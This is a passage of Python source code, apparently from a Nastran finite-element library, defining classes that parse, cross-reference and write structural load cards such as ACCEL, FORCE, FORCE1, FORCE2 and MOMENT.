is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n return self.comment + print_card_16(card)\n\n\nclass ACCEL(BaseCard):\n \"\"\"\n Acceleration Load\n\n Defines static acceleration loads, which may vary over a region of\n the structural model. The load variation is based upon the tabular\n input defined on this Bulk Data entry.\n\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +=======+======+======+========+======+=====+=====+========+=====+\n | ACCEL | SID | CID | N1 | N2 | N3 | DIR | | |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | | LOC1 | VAL1 | LOC2 | VAL2 | Continues in Groups of 2 |\n +-------+------+------+--------+------+--------------------------+\n | ACCEL | 100 | 2 | 0.0 | 1.0 | 2.0 | X | | |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | | 1.0 | 1.1 | 2.0 | 2.1 | 3.0 | 3.1 | 4.0 | 4.1 |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n \"\"\"\n type = 'ACCEL'\n\n def __init__(self, sid, N, direction, locs, vals, cid=0, comment=''):\n \"\"\"\n Creates an ACCEL card\n\n Parameters\n ----------\n sid : int\n load id\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n direction : str\n Component direction of acceleration variation\n {X, Y, Z}\n locs : List[float]\n Location along direction DIR in coordinate system CID for\n specification of a load scale factor.\n vals : List[float]\n The load scale factor associated with location LOCi\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n #: Load set identification number (Integer>0)\n self.sid = sid\n #: Coordinate system identification number. (Integer>0: Default=0)\n self.cid = cid\n\n #: Components of the acceleration vector measured in coordinate system\n #: CID. (Real; at least one Ni != 0)\n self.N = np.asarray(N, dtype='float64')\n\n #: Component direction of acceleration variation. (Character; one of X,Y or Z)\n self.direction = direction\n self.locs = array(locs, dtype='float64')\n self.vals = array(vals, dtype='float64')\n self.cid_ref = None\n\n def validate(self):\n assert max(abs(self.N)) > 0.\n assert self.direction in ['X', 'Y', 'Z'], 'dir=%r' % self.direction\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a ACCEL card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n N = [double_or_blank(card, 3, 'N1', 0.0),\n double_or_blank(card, 4, 'N2', 0.0),\n double_or_blank(card, 5, 'N3', 0.0)]\n direction = string(card, 6, 'dir')\n\n i = 9\n locs = []\n vals = []\n j = 0\n nfields = len(card)\n while i < nfields:\n #raise NotImplementedError('ACCEL-line 2')\n loc = double(card, i, 'loc%i' % j)\n val = double(card, i, 'loc%i' % j)\n #print('i=%s j=%s len=%s loc=%s val=%s' % (i, j, len(card), loc, val))\n locs.append(loc)\n vals.append(val)\n j += 1\n i += 2\n return ACCEL(sid, N, direction, locs, vals, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by ACCEL sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n msg = ', which is required by ACCEL sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'ACCEL', self.sid, self.Cid(),\n self.N[0], self.N[1], self.N[2], self.direction, None, None,\n ]\n for loc, val in zip(self.locs, self.vals):\n list_fields += [loc, val]\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass ACCEL1(BaseCard):\n \"\"\"\n Acceleration Load\n\n Defines static acceleration loads at individual GRID points.\n\n +--------+---------+---------+-----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 |\n +========+=========+=========+=====+====+====+====+\n | ACCEL1 | SID | CID | A | N1 | N2 | N3 |\n +--------+---------+---------+-----+----+----+----+\n | | GRIDID1 | GRIDID2 | etc | | | |\n +--------+---------+---------+-----+----+----+----+\n \"\"\"\n type = 'ACCEL1'\n\n def __init__(self, sid, scale, N, nodes, cid=0, comment=''):\n \"\"\"\n Creates an ACCEL1 card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n scale factor for load\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n direction : str\n Component direction of acceleration variation\n {X, Y, Z}\n nodes : List[int]\n the nodes to apply acceleration to\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n #: Load set identification number (Integer>0)\n self.sid = sid\n\n #: Coordinate system identification number. (Integer>0: Default=0)\n self.cid = cid\n\n #: Acceleration vector scale factor. (Real)\n self.scale = scale\n\n #: Components of the acceleration vector measured in coordinate system\n #: CID. (Real; at least one Ni != 0)\n self.N = np.asarray(N)\n\n #: nodes to apply the acceleration to\n self.nodes = expand_thru_by(nodes)\n\n assert max(abs(self.N)) > 0.\n self.nodes_ref = None\n self.cid_ref = None\n\n def validate(self):\n assert len(self.N) == 3, 'N=%r' % self.N\n assert isinstance(self.cid, integer_types), 'cid=%r' % self.cid\n assert isinstance(self.scale, float_types), 'scale=%r' % self.scale\n assert isinstance(self.nodes, list), 'nodes=%r' % self.nodes\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a ACCEL1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = [double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)]\n\n nodes = fields(integer_or_string, card, 'node', i=9, j=len(card))\n return ACCEL1(sid, scale, N, nodes, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by ACCEL1 sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n self.nodes_ref = model.EmptyNodes(self.node_ids, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors):\n msg = ', which is required by ACCEL1 sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n self.nodes_ref = model.EmptyNodes(self.node_ids, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.nodes = self.node_ids\n self.nodes_ref = None\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n @property\n def node_ids(self):\n #msg = ', which is required by ACCEL1 sid=%s' % self.sid\n #_node_ids(self.nodes, allow_empty_nodes=True, msg=msg)\n return self._node_ids(nodes=self.nodes_ref)\n\n def _node_ids(self, nodes=None): # this function comes from BaseCard.py\n \"\"\"returns node_ids for repr functions\"\"\"\n if not nodes:\n nodes = self.nodes\n if isinstance(nodes[0], integer_types):\n node_ids = [node for node in nodes]\n else:\n node_ids = [node.nid for node in nodes]\n assert 0 not in node_ids, 'node_ids = %s' % (node_ids)\n return node_ids\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'ACCEL1', self.sid, self.Cid(), self.scale,\n self.N[0], self.N[1], self.N[2], None, None\n ] + collapse_thru_by(self.node_ids)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\n#class Force(Load):\n #\"\"\"Generic class for all Forces\"\"\"\n #type = 'Force'\n\n #def __init__(self):\n #Load.__init__(self)\n\n #def transform_load(self):\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_loads(self):\n #return [self]\n\n #def F(self):\n #return self.xyz * self.mag\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = self.F()\n #return(scale_factors, loads)\n\n #def write_card(self, size=8, is_double=False):\n #card = self.raw_fields()\n #if size == 8:\n #return self.comment + print_card_8(card)\n #if is_double:\n #return self.comment + print_card_double(card)\n #return self.comment + print_card_16(card)\n\n\n#class Moment(Load):\n #\"\"\"Generic class for all Moments\"\"\"\n #type = 'Moment'\n\n #def __init__(self):\n #Load.__init__(self)\n\n #def transform_load(self):\n ##print(\"self.xyz = \",self.xyz)\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n ##print(\"mag=%s xyz=%s\" % (self.mag, xyz))\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_loads(self):\n #return [self]\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = {\n #self.node: self.M()\n #}\n #return(scale_factors, loads)\n\n #def write_card(self, size=8, is_double=False):\n #card = self.raw_fields()\n #if size == 8:\n #return self.comment + print_card_8(card)\n #if is_double:\n #return self.comment + print_card_double(card)\n #return self.comment + print_card_16(card)\n\n\nclass Load0(BaseCard):\n \"\"\"common class for FORCE, MOMENT\"\"\"\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a FORCE/MOMENT card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.cid = cid\n self.mag = mag\n self.xyz = np.asarray(xyz, dtype='float64')\n assert self.xyz.size == 3, self.xyz.shape\n assert isinstance(self.cid, int), self.cid\n self.node_ref = None\n self.cid_ref = None\n\n def validate(self):\n assert isinstance(self.cid, int), self.cid\n assert isinstance(self.mag, float), self.mag\n assert self.xyz.size == 3, self.xyz.shape\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a FORCE/MOMENT card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n cid = integer_or_blank(card, 3, 'cid', 0)\n mag = double(card, 4, 'mag')\n xyz = array([double_or_blank(card, 5, 'X1', 0.0),\n double_or_blank(card, 6, 'X2', 0.0),\n double_or_blank(card, 7, 'X3', 0.0)])\n assert len(card) <= 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE/MOMENT card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n cid = data[2]\n mag = data[3]\n xyz = array(data[4:7])\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n # try:\n self.node_ref = model.Node(self.node, msg=msg)\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def get_loads(self):\n return [self]\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n def transform_load(self):\n xyz = self.cid_ref.transform_node_to_global(self.xyz)\n if self.mag > 0.:\n return (True, self.node, self.mag * xyz) # load\n return (False, self.node, xyz) # enforced displacement\n\n def raw_fields(self):\n list_fields = [self.type, self.sid, self.node_id, self.Cid(),\n self.mag] + list(self.xyz)\n return list_fields\n\n def repr_fields(self):\n cid = set_blank_if_default(self.Cid(), 0)\n list_fields = [self.type, self.sid, self.node_id, cid,\n self.mag] + list(self.xyz)\n return list_fields\n\n\nclass FORCE(Load0):\n \"\"\"\n Defines a static concentrated force at a grid point by specifying a\n scale factor and a vector that determines the direction.\n\n +-------+-----+------+-------+------+------+------+------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=======+=====+======+=======+======+======+======+======+\n | FORCE | SID | NODE | CID | MAG | FX | FY | FZ |\n +-------+-----+------+-------+------+------+------+------+\n | FORCE | 3 | 1 | | 100. | 0. | 0. | 1. |\n +-------+-----+------+-------+------+------+------+------+\n \"\"\"\n type = 'FORCE'\n\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a FORCE card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load0.__init__(self, sid, node, mag, xyz, cid=cid, comment=comment)\n\n def write_card(self, size=8, is_double=False):\n if size == 8:\n cids = set_string8_blank_if_default(self.Cid(), 0)\n msg = 'FORCE %8i%8i%8s%8s%8s%8s%8s\\n' % (\n self.sid, self.node_id,\n cids, print_float_8(self.mag), print_float_8(self.xyz[0]),\n print_float_8(self.xyz[1]), print_float_8(self.xyz[2]))\n else:\n cids = set_string16_blank_if_default(self.Cid(), 0)\n if is_double:\n msg = ('FORCE* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n cids, print_scientific_double(self.mag),\n print_scientific_double(self.xyz[0]),\n print_scientific_double(self.xyz[1]),\n print_scientific_double(self.xyz[2]))\n else:\n msg = ('FORCE* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n cids, print_float_16(self.mag), print_float_16(self.xyz[0]),\n print_float_16(self.xyz[1]), print_float_16(self.xyz[2]))\n return self.comment + msg\n\n\nclass Load1(BaseCard):\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a FORCE1/MOMENT1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.mag = mag\n self.g1 = g1\n self.g2 = g2\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.xyz = None\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a FORCE1/MOMENT1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n assert len(card) == 6, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE1/MOMENT1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n mag = data[2]\n g1 = data[3]\n g2 = data[4]\n return cls(sid, node, mag, g1, g2, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.g1_ref = model.Node(self.g1, msg=msg)\n self.g2_ref = model.Node(self.g2, msg=msg)\n\n self.xyz = self.g2_ref.get_position() - self.g1_ref.get_position()\n normalize(self)\n\n def uncross_reference(self):\n self.node = self.node_id\n self.g1 = self.G1()\n self.g2 = self.G2()\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n\n def safe_cross_reference(self, model, safe_coord, debug=True):\n \"\"\"\n .. todo:: cross reference and fix repr function\n \"\"\"\n return self.cross_reference(model)\n #msg = ', which is required by FORCE1 sid=%s' % self.sid\n #self.node_ref = model.Node(self.node, msg=msg)\n #self.g1_ref = model.Node(self.g1, msg=msg)\n #self.g2_ref = model.Node(self.g2, msg=msg)\n #self.xyz = self.g2.get_position() - self.g1.get_position()\n #normalize(self)\n\n def get_loads(self):\n return [self]\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n @property\n def node_ids(self):\n return [self.node_id, self.G1(), self.G2()]\n\n def G1(self):\n if self.g1_ref is not None:\n return self.g1_ref.nid\n return self.g1\n\n def G2(self):\n if self.g2_ref is not None:\n return self.g2_ref.nid\n return self.g2\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def raw_fields(self):\n list_fields = [self.type, self.sid, self.node_id, self.mag, self.G1(), self.G2()]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass FORCE1(Load1):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and two grid points that determine the direction.\n\n +--------+-----+----+-------+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 |\n +========+=====+====+=======+====+====+\n | FORCE1 | SID | G | F | G1 | G2 |\n +--------+-----+----+-------+----+----+\n | FORCE1 | 6 | 13 | -2.93 | 16 | 13 |\n +--------+-----+----+-------+----+----+\n \"\"\"\n type = 'FORCE1'\n\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a FORCE1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load1.__init__(self, sid, node, mag, g1, g2, comment)\n #Force.__init__(self)\n\n\nclass Load2(BaseCard):\n \"\"\"common class for FORCE2, MOMENT2\"\"\"\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n \"\"\"\n Creates a FORCE2/MOMENT2 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n g1 / g2 / g3 / g4 : int / int / int / int\n defines the load direction\n n = (g2 - g1) x (g4 - g3)\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.mag = mag\n self.g1 = g1\n self.g2 = g2\n self.g3 = g3\n self.g4 = g4\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.g3_ref = None\n self.g4_ref = None\n self.xyz = None\n\n def validate(self):\n assert isinstance(self.sid, integer_types), str(self)\n assert self.g1 is not None, self.g1\n assert self.g2 is not None, self.g2\n assert self.g3 is not None, self.g3\n assert self.g1 != self.g2, 'g1=%s g2=%s' % (self.g1, self.g2)\n assert self.g3 != self.g4, 'g3=%s g4=%s' % (self.g3, self.g4)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a FORCE2/MOMENT2 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n g3 = integer(card, 6, 'g3')\n g4 = integer_or_blank(card, 7, 'g4')\n assert len(card) in [7, 8], 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE2/MOMENT2 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n mag = data[2]\n g1 = data[3]\n g2 = data[4]\n g3 = data[5]\n g4 = data[6]\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.g1_ref = model.Node(self.g1, msg=msg)\n self.g2_ref = model.Node(self.g2, msg=msg)\n self.g3_ref = model.Node(self.g3, msg=msg)\n\n xyz1 = self.g1_ref.get_position()\n xyz2 = self.g2_ref.get_position()\n xyz3 = self.g3_ref.get_position()\n v21 = xyz2 - xyz1\n\n try:\n v21 /= norm(v21)\n except FloatingPointError:\n msg = 'v1=v21=%s norm(v21)=%s\\n' % (v21, norm(v21))\n msg += 'g1.get_position()=%s\\n' % xyz1\n msg += 'g2.get_position()=%s' % xyz2\n raise FloatingPointError(msg)\n\n if self.g4 is None:\n xyz4 = None\n v2 = xyz3 - xyz1\n try:\n v2 /= norm(v2)\n except FloatingPointError:\n msg = 'v2=v31=%s norm(v31)=%s\\n' % (v2, norm(v2))\n msg += 'g3.get_position()=%s\\n' % xyz3\n msg += 'g1.get_position()=%s' % xyz1\n raise FloatingPointError(msg)\n xyz = cross(v21, v2)\n else:\n self.g4_ref = model.Node(self.g4, msg=msg)\n xyz4 = self.g4_ref.get_position()\n v2 = xyz4 - xyz3\n\n try:\n v2 /= norm(v2)\n except FloatingPointError:\n msg = 'v2=v43=%s norm(v43)=%s\\n' % (v2, norm(v2))\n msg += 'g3.get_position()=%s\\n' % xyz3\n msg += 'g4.get_position()=%s' % xyz4\n raise FloatingPointError(msg)\n xyz = cross(v21, v2)\n\n self.xyz = xyz\n\n msgi = 'xyz1=%s xyz2=%s xyz3=%s xyz4=%s\\nv21=%s v43 (or v31)=%s\\nxyz=%s' % (\n xyz1, xyz2, xyz3, xyz4, v21, v2, self.xyz)\n normalize(self, msgi)\n\n def safe_cross_reference(self, model, safe_coord, debug=True):\n \"\"\"\n .. todo:: cross reference and fix repr function\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n is_failed = False\n try:\n self.node_ref = model.Node(self.node, msg=msg)\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference NODE=%i%s' % (self.node, msg))\n\n try:\n self.g1_ref = model.Node(self.g1, msg=msg)\n xyz1 = self.g1_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G1=%i%s' % (self.g1, msg))\n\n try:\n self.g2_ref = model.Node(self.g2, msg=msg)\n xyz2 = self.g2_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G2=%i%s' % (self.g2, msg))\n\n try:\n self.g3_ref = model.Node(self.g3, msg=msg)\n xyz3 = self.g3_ref.get_position()\n except KeyError:\n is_failed = True\n model.log.warning('failed to cross-reference G3=%i%s' % (self.g3, msg))\n\n if not is_failed:\n v21 = xyz2 - xyz1\n\n if self.g4 is not None:\n try:\n self.g4_ref = model.Node(self.g4, msg=msg)\n except KeyError:\n is_failed = True\n if not is_failed:\n xyz4 = self.g4_ref.get_position()\n model.log.warning('failed to cross-reference G4=%i%s' % (self.g4, msg))\n else:\n xyz3, xyz4 = xyz1, xyz3\n\n if not is_failed:\n v43 = xyz4 - xyz3\n v2 = v43\n try:\n v21 /= norm(v21)\n except FloatingPointError:\n msg = 'v21=%s norm(v21)=%s\\n' % (v21, norm(v21))\n msg += 'g1.get_position()=%s\\n' % xyz1\n msg += 'g2.get_position()=%s' % xyz2\n raise FloatingPointError(msg)\n\n try:\n v43 /= norm(v43)\n except FloatingPointError:\n msg = 'v43=%s norm(v43)=%s\\n' % (v43, norm(v43))\n msg += 'g3.get_position()=%s\\n' % xyz3\n msg += 'g4.get_position()=%s' % xyz4\n raise FloatingPointError(msg)\n self.xyz = cross(v21, v43)\n\n #msgi = 'xyz1=%s xyz2=%s xyz3=%s xyz4=%s\\nv21=%s v43 (or v31)=%s\\nxyz=%s' % (\n #xyz1, xyz2, xyz3, xyz4, v21, v2, self.xyz)\n normalize(self, msg)\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n def uncross_reference(self):\n self.node = self.node_id\n self.g1 = self.G1()\n self.g2 = self.G2()\n self.g3 = self.G3()\n self.g4 = self.G4()\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.g3_ref = None\n self.g4_ref = None\n self.xyz = None\n\n def get_loads(self):\n return [self]\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def G1(self):\n if self.g1_ref is not None:\n return self.g1_ref.nid\n return self.g1\n\n def G2(self):\n if self.g2_ref is not None:\n return self.g2_ref.nid\n return self.g2\n\n def G3(self):\n if self.g3_ref is not None:\n return self.g3_ref.nid\n return self.g3\n\n def G4(self):\n if self.g4_ref is not None:\n return self.g4_ref.nid\n return self.g4\n\n @property\n def node_ids(self):\n return [self.node_id, self.G1(), self.G2(), self.G3(), self.G4()]\n\n def _node_ids(self, nodes=None):\n \"\"\"returns nodeIDs for repr functions\"\"\"\n if not nodes:\n nodes = self.nodes\n if isinstance(nodes[0], integer_types):\n return [node for node in nodes]\n else:\n return [node.nid for node in nodes]\n\n def raw_fields(self):\n (node, g1, g2, g3, g4) = self._node_ids([self.node, self.g1, self.g2, self.g3, self.g4])\n list_fields = [self.type, self.sid, node, self.mag, g1, g2, g3, g4]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n #def transform_load(self):\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = self.F()\n #return(scale_factors, loads)\n\n\nclass FORCE2(Load2):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and four grid points that determine the direction.\n\n +--------+-----+---+---+----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +========+=====+===+===+====+====+====+====+\n | FORCE2 | SID | G | F | G1 | G2 | G3 | G4 |\n +--------+-----+---+---+----+----+----+----+\n \"\"\"\n type = 'FORCE2'\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n Load2.__init__(self, sid, node, mag, g1, g2, g3, g4, comment)\n\n\n\nclass MOMENT(Load0):\n \"\"\"\n Defines a static concentrated moment at a grid point by specifying a\n scale factor and a vector that determines the direction.\n\n +--------+-----+---+-----+-----+-----+-----+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +========+=====+===+=====+=====+=====+=====+=====+\n | MOMENT | SID | G | CID | M | N1 | N2 | N3 |\n +--------+-----+---+-----+-----+-----+-----+-----+\n | MOMENT | 2 | 5 | 6 | 2.9 | 0.0 | 1.0 | 0.0 |\n +--------+-----+---+-----+-----+-----+-----+-----+\n \"\"\"\n type = 'MOMENT'\n\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a MOMENT card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load0.__init__(self, sid, node, mag, xyz, cid=cid, comment=comment)\n\n def uncross_reference(self):\n self.node = self.node_id\n self.cid = self.Cid()\n self.node_ref = None\n self.cid_ref = None\n\n @property\n def node_ids(self):\n \"\"\"all the nodes referenced by the load\"\"\"\n return [self.node_id]\n\n @property\n def node_id(self):\n if self.node_ref is None:\n return self.node\n return self.node_ref.nid\n\n def raw_fields(self):\n list_fields = ['MOMENT', self.sid, self.node_id, self.Cid(),\n 